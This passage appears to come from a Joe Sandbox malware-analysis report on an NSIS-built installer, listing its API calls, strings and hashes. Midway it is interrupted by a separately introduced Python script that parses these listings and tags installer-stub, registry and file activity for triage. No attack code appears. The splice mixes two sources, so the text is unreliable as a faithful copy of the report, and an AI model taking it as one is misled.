                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Similarity
                                      • API ID: HandleModule$AddressCharCommandErrorFileInfoInitializeLibraryLineLoadModeNextPathProcTemplstrcpyn
                                      • String ID: $NSIS Error
                                      • API String ID: 3130561831-3882934480
                                      • Opcode ID: 783531bee77386b6c5f7799fe16efcc6e6d2b48535e64221b1f7caff5671a898
                                      • Instruction ID: 124ce2dc19c04b2723b3ee2bfd57496e8178ec0f66411d0265dc8e2868322ed2
                                      • Opcode Fuzzy Hash: 783531bee77386b6c5f7799fe16efcc6e6d2b48535e64221b1f7caff5671a898
                                      • Instruction Fuzzy Hash: B121B7B09083456FE7106F749D09B2B7EACEB8A305F00447EF681B62D2C77C59058B6B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 00402ECE
                                      • GetTickCount.KERNEL32 ref: 00402F55
                                      • MulDiv.KERNEL32(7FFFFFFF,00000064,00008000), ref: 00402F82
                                      • wsprintfA.USER32 ref: 00402F92
                                      • WriteFile.KERNEL32(?,?,?,7FFFFFFF,00000000), ref: 00402FC0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Similarity
                                      • API ID: CountTick$FileWritewsprintf
                                      • String ID: ... %d%%$@0
                                      • API String ID: 4209647438-86420950
                                      • Opcode ID: 999cfab09825ec686d516b9a40fe547eeb8bd05469905d0b0f7633e1135354fd
                                      • Instruction ID: 64f2759147e90b76427b42c30fbf34f55c7ad126d9beac386cd9b4cb986d71c7
                                      • Opcode Fuzzy Hash: 999cfab09825ec686d516b9a40fe547eeb8bd05469905d0b0f7633e1135354fd
                                      • Instruction Fuzzy Hash: A4417E7190020AEBCF10DFA9DA48A9E7BB8FB04355F14413BF901F62D4D7789A50DB9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetWindowLongA.USER32(?,000000EB), ref: 00403F0B
                                      • GetSysColor.USER32(00000000), ref: 00403F27
                                      • SetTextColor.GDI32(?,00000000), ref: 00403F33
                                      • SetBkMode.GDI32(?,?), ref: 00403F3F
                                      • GetSysColor.USER32(?), ref: 00403F52
                                      • SetBkColor.GDI32(?,?), ref: 00403F62
                                      • DeleteObject.GDI32(?), ref: 00403F7C
                                      • CreateBrushIndirect.GDI32(?), ref: 00403F86
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                       • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Similarity
                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                      • String ID:
                                      • API String ID: 2320649405-0
                                      • Opcode ID: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                      • Instruction ID: 43f1f9eadd2e023582460ec461a07703dc87d5103ca70cdaf59bc9c3c4c10c95
                                      • Opcode Fuzzy Hash: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                      • Instruction Fuzzy Hash: B1219971904705AFC7219F68DD08B5BBFF8AF01715F04852AF995E22D1C378E944CB55
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GlobalAlloc.KERNEL32(00000040,00000020), ref: 00402DE4
                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,000000FF,00000000,00000000,?,?), ref: 00402E4A
                                        • Part of subcall function 00402BCF: DestroyWindow.USER32(?,00000000,00402DAF,00000001), ref: 00402BE2
                                      Strings
                                      • Inst, xrefs: 00402D18
                                      • Null, xrefs: 00402D2A
                                      • soft, xrefs: 00402D21
                                       • Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author to obtain a new copy. More information at: http://nsis.sf.net/NSIS_Error, xrefs: 00402E0B
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                       • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Similarity
                                      • API ID: AllocDestroyFileGlobalPointerWindow
                                       • String ID: Inst$Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author to obtain a new copy. More information at: http://nsis.sf.net/NSIS_Error$Null$soft
                                      • API String ID: 1580554587-639894862
                                      • Opcode ID: 8c6f0ba6a9b99bef2e223335ce12acd5a5288f385b5620c3a51d65f503cbdf54
                                      • Instruction ID: 3f971f39210b7e6cbde4b42bc9c0850d6f2177758484559a6030f38e5231e302
                                      • Opcode Fuzzy Hash: 8c6f0ba6a9b99bef2e223335ce12acd5a5288f385b5620c3a51d65f503cbdf54
                                      • Instruction Fuzzy Hash: 8841A4319402159BDF209F65DA89BAA7BA4EF44354F14403BEA04B62D1C7BC9E818BAD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026E1
                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026FD
                                      • GlobalFree.KERNEL32(?), ref: 00402736
                                      • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402748
                                      • GlobalFree.KERNEL32(00000000), ref: 0040274F
                                      • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402767
                                      • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040277B
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                       • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Similarity
                                      • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                      • String ID:
                                      • API String ID: 3294113728-0
                                      • Opcode ID: 24339d99f87c6d6ba69fc8207295b24e7ba760fe95e7986aeaf2365a98965083
                                      • Instruction ID: 94283e328d35fee59e2da4f8035aa06736476ebf885dd15e4876c46effbb42d0
                                      • Opcode Fuzzy Hash: 24339d99f87c6d6ba69fc8207295b24e7ba760fe95e7986aeaf2365a98965083
                                      • Instruction Fuzzy Hash: E4319171C00128BBCF216FA5DD89DAE7E79EF05364F20423AF520762E1C7791D408BA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • lstrlenA.KERNEL32(0079E4D8), ref: 00404EBD
                                      • lstrlenA.KERNEL32(?,0079E4D8), ref: 00404ECD
                                      • lstrcatA.KERNEL32(0079E4D8,?,?,0079E4D8), ref: 00404EE0
                                      • SetWindowTextA.USER32(0079E4D8,0079E4D8), ref: 00404EF2
                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F18
                                      • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F32
                                      • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F40
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                       • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Similarity
                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                      • String ID:
                                      • API String ID: 2531174081-0
                                      • Opcode ID: 6d23eeeeadc8c975830744756af2e0c6f2d7ce04b7bca1b24e7dcfc844a15c14
                                      • Instruction ID: 0879e44440130bf100c4abc817e106b172b9c081b4a19821dc72f8a86b472426
                                      • Opcode Fuzzy Hash: 6d23eeeeadc8c975830744756af2e0c6f2d7ce04b7bca1b24e7dcfc844a15c14
                                      • Instruction Fuzzy Hash: E3216071900118BFDB019FA5CD849DEBFB9EB45354F14807AF904B6291C6785E40CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040476A
                                      • GetMessagePos.USER32 ref: 00404772
                                      • ScreenToClient.USER32(?,?), ref: 0040478C
                                      • SendMessageA.USER32(?,00001111,00000000,?), ref: 0040479E
                                      • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004047C4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                       • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Similarity
                                      • API ID: Message$Send$ClientScreen
                                      • String ID: f
                                      • API String ID: 41195575-1993550816
                                      • Opcode ID: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                      • Instruction ID: 6bd71cb3d479751b3b69d93d67c88433f783f46e4abb255f82c81c082e4bdd88
                                      • Opcode Fuzzy Hash: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                      • Instruction Fuzzy Hash: C5014075D00218BADB01DBA4DC45FFEBBBCAB55711F10412BBB10B71C0C7B865018BA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B67
                                      • MulDiv.KERNEL32(?,00000064,?), ref: 00402B92
                                      • wsprintfA.USER32 ref: 00402BA2
                                      • SetWindowTextA.USER32(?,?), ref: 00402BB2
                                      • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BC4
                                      Strings
                                      • verifying installer: %d%%, xrefs: 00402B9C
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                       • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Similarity
                                      • API ID: Text$ItemTimerWindowwsprintf
                                      • String ID: verifying installer: %d%%
                                      • API String ID: 1451636040-82062127
                                      • Opcode ID: b2596dc42376c4ed7c7376505dbeede42f27e887c2baf36158ddba7532441070
                                      • Instruction ID: 338c4dd4cc7a1f9a3f94f7e8e9aba01fa07f8a2d27e46d6da828e47d9d426f75
                                      • Opcode Fuzzy Hash: b2596dc42376c4ed7c7376505dbeede42f27e887c2baf36158ddba7532441070
                                      • Instruction Fuzzy Hash: 32014F70540208ABEF249F61DD0AEAE37B9AB00304F00803AFA06A92D1D7B9A9518B59
                                      Uniqueness

                                      Uniqueness Score: -1.00%
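The APIs and Strings listings above follow a fixed line format ("• Name.MODULE(args), ref: ADDR", "• text, xrefs: ADDR", with "Part of subcall function" prefixes for indirect calls), and two of the functions carry literal NSIS installer-stub markers (the "NSIS Error" integrity-check message with its nsis.sf.net URL, and "verifying installer: %d%%"). The Python script below is an added example, not part of the Joe Sandbox report: it parses listings in that shape into records and tags each one so an analyst can set the stock NSIS stub functions aside and look first at records that touch the registry or write and delete files. The sample listing embedded in the script is constructed in the shape of the blocks above; the marker list, the tag names and the `parse_listing`, `triage` and `summarize` helpers are the example's own choices.

```python
"""Parse Joe Sandbox function-analysis listings (APIs / Strings blocks) into
records and tag NSIS installer-stub boilerplate vs. registry/file activity."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# One "• Name.MODULE(args), ref: ADDR" line. Parens and the comma are optional
# ("• wsprintfA.USER32 ref: 00402BA2"); subcall lines carry a caller prefix.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<caller>[0-9A-F]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>[A-Z0-9]+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})$"
)
# "• text, xrefs: ADDR"; the text may itself contain commas, so anchor on the tail.
STRING_RE = re.compile(r"^•\s*(?P<text>.*), xrefs:\s*(?P<xref>[0-9A-F]{8})$")

# Literal markers of stock NSIS stub code (all three appear in the listing).
NSIS_MARKERS = ("nsis.sf.net", "NSIS Error", "verifying installer:")
SECTION_HEADERS = ("Strings", "Memory Dump Source", "Similarity", "Uniqueness")


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str
    caller: Optional[str] = None  # set only for "Part of subcall function" lines


@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[Tuple[str, str]] = field(default_factory=list)  # (text, xref)


def parse_listing(text: str) -> List[FunctionRecord]:
    """One record per 'APIs' header; everything else is assigned by section."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionRecord()
            records.append(current)
            section = "APIs"
            continue
        if current is None:
            continue
        if line in SECTION_HEADERS:
            section = line
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                args = [a for a in (m["args"] or "").split(",") if a]
                current.apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["caller"]))
        elif section == "Strings":
            m = STRING_RE.match(line)
            if m:
                current.strings.append((m["text"], m["xref"]))
    return records


def triage(record: FunctionRecord) -> set:
    """Tags an analyst uses to decide which record to open first."""
    tags = set()
    direct = {c.name for c in record.apis if c.caller is None}  # ignore subcall noise
    if any(marker in text for text, _ in record.strings for marker in NSIS_MARKERS):
        tags.add("nsis-stub")
    if direct & {"RegDeleteKeyA", "RegDeleteKeyW", "RegSetValueExA", "RegSetValueExW"}:
        tags.add("registry-modify")
    if "WriteFile" in direct:
        tags.add("file-write")
    if direct & {"DeleteFileA", "DeleteFileW"}:
        tags.add("file-delete")
    return tags


def summarize(text: str) -> dict:
    """Tag every record and count how many are NSIS stub boilerplate."""
    records = parse_listing(text)
    tagged = [(i, sorted(triage(r))) for i, r in enumerate(records)]
    return {"records": len(records),
            "nsis_stub": sum(1 for _, t in tagged if "nsis-stub" in t),
            "tags": tagged}


# Constructed sample in the shape of the listing blocks (not report output).
SAMPLE = """\
APIs
• GlobalAlloc.KERNEL32(00000040,00000020), ref: 00402DE4
• SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00402E4A
  • Part of subcall function 00402BCF: DestroyWindow.USER32(?,00000000,00402DAF,00000001), ref: 00402BE2
Strings
• Inst, xrefs: 00402D18
• Installer integrity check has failed. More information at: http://nsis.sf.net/NSIS_Error, xrefs: 00402E0B
Memory Dump Source
• Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B67
• wsprintfA.USER32 ref: 00402BA2
Strings
• verifying installer: %d%%, xrefs: 00402B9C
Uniqueness

APIs
• RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A68
• RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AA4
• RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AF0
Uniqueness
"""

if __name__ == "__main__":
    for index, tags in summarize(SAMPLE)["tags"]:
        print(f"record {index}: {tags or ['untagged']}")
```

Run it over a saved copy of the report's function-analysis text instead of `SAMPLE` to get the same tags for every listed function; records without the `nsis-stub` tag but with registry or file tags are the ones to open in the disassembler first.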

                                      APIs
                                      • CharNextA.USER32(?,*?|<>/":,00000000,007A8000,007A9400,007A9400,00000000,004030C7,007A9400,75EE3410,0040329C), ref: 00405E3A
                                      • CharNextA.USER32(?,?,?,00000000), ref: 00405E47
                                      • CharNextA.USER32(?,007A8000,007A9400,007A9400,00000000,004030C7,007A9400,75EE3410,0040329C), ref: 00405E4C
                                      • CharPrevA.USER32(?,?,007A9400,007A9400,00000000,004030C7,007A9400,75EE3410,0040329C), ref: 00405E5C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                       • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Similarity
                                      • API ID: Char$Next$Prev
                                      • String ID: *?|<>/":
                                      • API String ID: 589700163-165019052
                                      • Opcode ID: d928069b7c755bad4a389a515b6181ca2d01bb1fc6f8e262afaf253ea7149d91
                                      • Instruction ID: a557d67b3617775de9dfc0e1e9fcc5985f61690f1b3cb59da45a53f3e3fbe4e1
                                      • Opcode Fuzzy Hash: d928069b7c755bad4a389a515b6181ca2d01bb1fc6f8e262afaf253ea7149d91
                                      • Instruction Fuzzy Hash: 1B11E771804B9129EB3217248C44B77AF98CB9B7A0F18047BE5C5723C2C67C5E828EED
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • lstrcatA.KERNEL32(00000000,00000000,00409B98,007A8800,00000000,00000000,00000031), ref: 0040177E
                                      • CompareFileTime.KERNEL32(-00000014,?,00409B98,00409B98,00000000,00000000,00409B98,007A8800,00000000,00000000,00000031), ref: 004017A8
                                        • Part of subcall function 00405B77: lstrcpynA.KERNEL32(?,?,00000400,0040315F,007A1F00,NSIS Error), ref: 00405B84
                                        • Part of subcall function 00404E84: lstrlenA.KERNEL32(0079E4D8), ref: 00404EBD
                                        • Part of subcall function 00404E84: lstrlenA.KERNEL32(?,0079E4D8), ref: 00404ECD
                                        • Part of subcall function 00404E84: lstrcatA.KERNEL32(0079E4D8,?,?,0079E4D8), ref: 00404EE0
                                        • Part of subcall function 00404E84: SetWindowTextA.USER32(0079E4D8,0079E4D8), ref: 00404EF2
                                        • Part of subcall function 00404E84: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F18
                                        • Part of subcall function 00404E84: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F32
                                        • Part of subcall function 00404E84: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F40
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                       • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Similarity
                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                      • String ID:
                                      • API String ID: 1941528284-0
                                      • Opcode ID: 643f2cdd29aac1b2aea48babbf9826ec4044719e9cd48a75cc6692d3d0005c94
                                      • Instruction ID: df8d039fdd937f1c478db27dfce12e75bce6feb5164cf919340bcacede668491
                                      • Opcode Fuzzy Hash: 643f2cdd29aac1b2aea48babbf9826ec4044719e9cd48a75cc6692d3d0005c94
                                      • Instruction Fuzzy Hash: F241B771900615BACB10BBA5CC46DAF7979DF42368F20423BF525F10E2DA3C5A419A6D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A68
                                      • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AA4
                                      • RegCloseKey.ADVAPI32(?), ref: 00402AAD
                                      • RegCloseKey.ADVAPI32(?), ref: 00402AD2
                                      • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AF0
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                       • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Similarity
                                      • API ID: Close$DeleteEnumOpen
                                      • String ID:
                                      • API String ID: 1912718029-0
                                      • Opcode ID: 8d132b12fb4f7e3c0c57d0df483c4ead623641b1822a26b8d9db536e3ea124b7
                                      • Instruction ID: 1ad4598d9375e79b5c4158f8ae6fede31b6a0d7771ae0489b8e1e2a10aea7df0
                                      • Opcode Fuzzy Hash: 8d132b12fb4f7e3c0c57d0df483c4ead623641b1822a26b8d9db536e3ea124b7
                                      • Instruction Fuzzy Hash: 72116D31600108BFDF219F90DE48DAA3B6DEB55348B108036FA06A00A0D7B89E519F69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CharNextA.USER32(?,00000000,?,?,004015C2,00000000,000000F0), ref: 004056CB
                                      • CharNextA.USER32(00000000,?,?,004015C2,00000000,000000F0), ref: 004056D0
                                      • CharNextA.USER32(00000000,?,?,004015C2,00000000,000000F0), ref: 004056E4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                       • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Similarity
                                      • API ID: CharNext
                                      • String ID: :$\
                                      • API String ID: 3213498283-1166558509
                                      • Opcode ID: 3f639457ae052313cff0aaedcd272a5626d50e6f9abcac8e261aee29ca5e702c
                                      • Instruction ID: d8a7812ab63b142c46357df6d68c050b156b7c96d32b59c6f1bc793f3f64125f
                                      • Opcode Fuzzy Hash: 3f639457ae052313cff0aaedcd272a5626d50e6f9abcac8e261aee29ca5e702c
                                      • Instruction Fuzzy Hash: 86F0C251905F91AAFB3252640C44B7B9BCCDB55315F041467E641672C1C2BD4C405F9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetDlgItem.USER32(?), ref: 00401CD0
                                      • GetClientRect.USER32(00000000,?), ref: 00401CDD
                                      • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CFE
                                      • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D0C
                                      • DeleteObject.GDI32(00000000), ref: 00401D1B
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                       • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Similarity
                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                      • String ID:
                                      • API String ID: 1849352358-0
                                      • Opcode ID: 8718ef474664ef02fb2026f6f5ca2eb5ae4bcb4a29c0f9619d4f19e816921c64
                                      • Instruction ID: 7c3280a60d84a3596340f685d6ada4bc9ba3972ea03b1155ec5ca5a37b5200ea
                                      • Opcode Fuzzy Hash: 8718ef474664ef02fb2026f6f5ca2eb5ae4bcb4a29c0f9619d4f19e816921c64
                                      • Instruction Fuzzy Hash: 01F04FB2905104AFD701EBA4EE88CAFB7BCEB44301B004476F601F2091C638AD018B79
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetDC.USER32(?), ref: 00401D29
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D36
                                      • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D45
                                      • ReleaseDC.USER32(?,00000000), ref: 00401D56
                                      • CreateFontIndirectA.GDI32(0040AFA0), ref: 00401DA1
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                       • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Similarity
                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                      • String ID:
                                      • API String ID: 3808545654-0
                                      • Opcode ID: d50846cf01dc4d21c027121a250a91c6e779b9c02126d39bd440f749e4007b39
                                      • Instruction ID: 4f22f7d967d41569425e1cc72a43e48c322de2a0bc5ea7779ffcdbaac11077e3
                                      • Opcode Fuzzy Hash: d50846cf01dc4d21c027121a250a91c6e779b9c02126d39bd440f749e4007b39
                                      • Instruction Fuzzy Hash: 760162B1958341AFE7015BB0AE1ABAF7F74A725705F100439F145BA2E2C67C14158B2B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • lstrlenA.KERNEL32(0079ECF8,0079ECF8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,0040458D,000000DF,0000040F,00000400,00000000), ref: 004046FB
                                      • wsprintfA.USER32 ref: 00404703
                                      • SetDlgItemTextA.USER32(?,0079ECF8), ref: 00404716
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmp
                                       • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Similarity
                                      • API ID: ItemTextlstrlenwsprintf
                                      • String ID: %u.%u%s%s
                                      • API String ID: 3540041739-3551169577
                                      • Opcode ID: de6b24ac2de06aa5a6c00b34d189335991a4621482d9b42b83f82e23e4af78ce
                                      • Instruction ID: 808364b1aeea65b13bf83ed040d55ad759ad6ec36480b824a7a4bb04bc91d3c3
                                      • Opcode Fuzzy Hash: de6b24ac2de06aa5a6c00b34d189335991a4621482d9b42b83f82e23e4af78ce
                                      • Instruction Fuzzy Hash: 8B1108736002243BDB0065699C06EEF329DDBC3375F14023BFA29F61D1E9799C5182E9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C18
                                      • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C30
                                      Strings
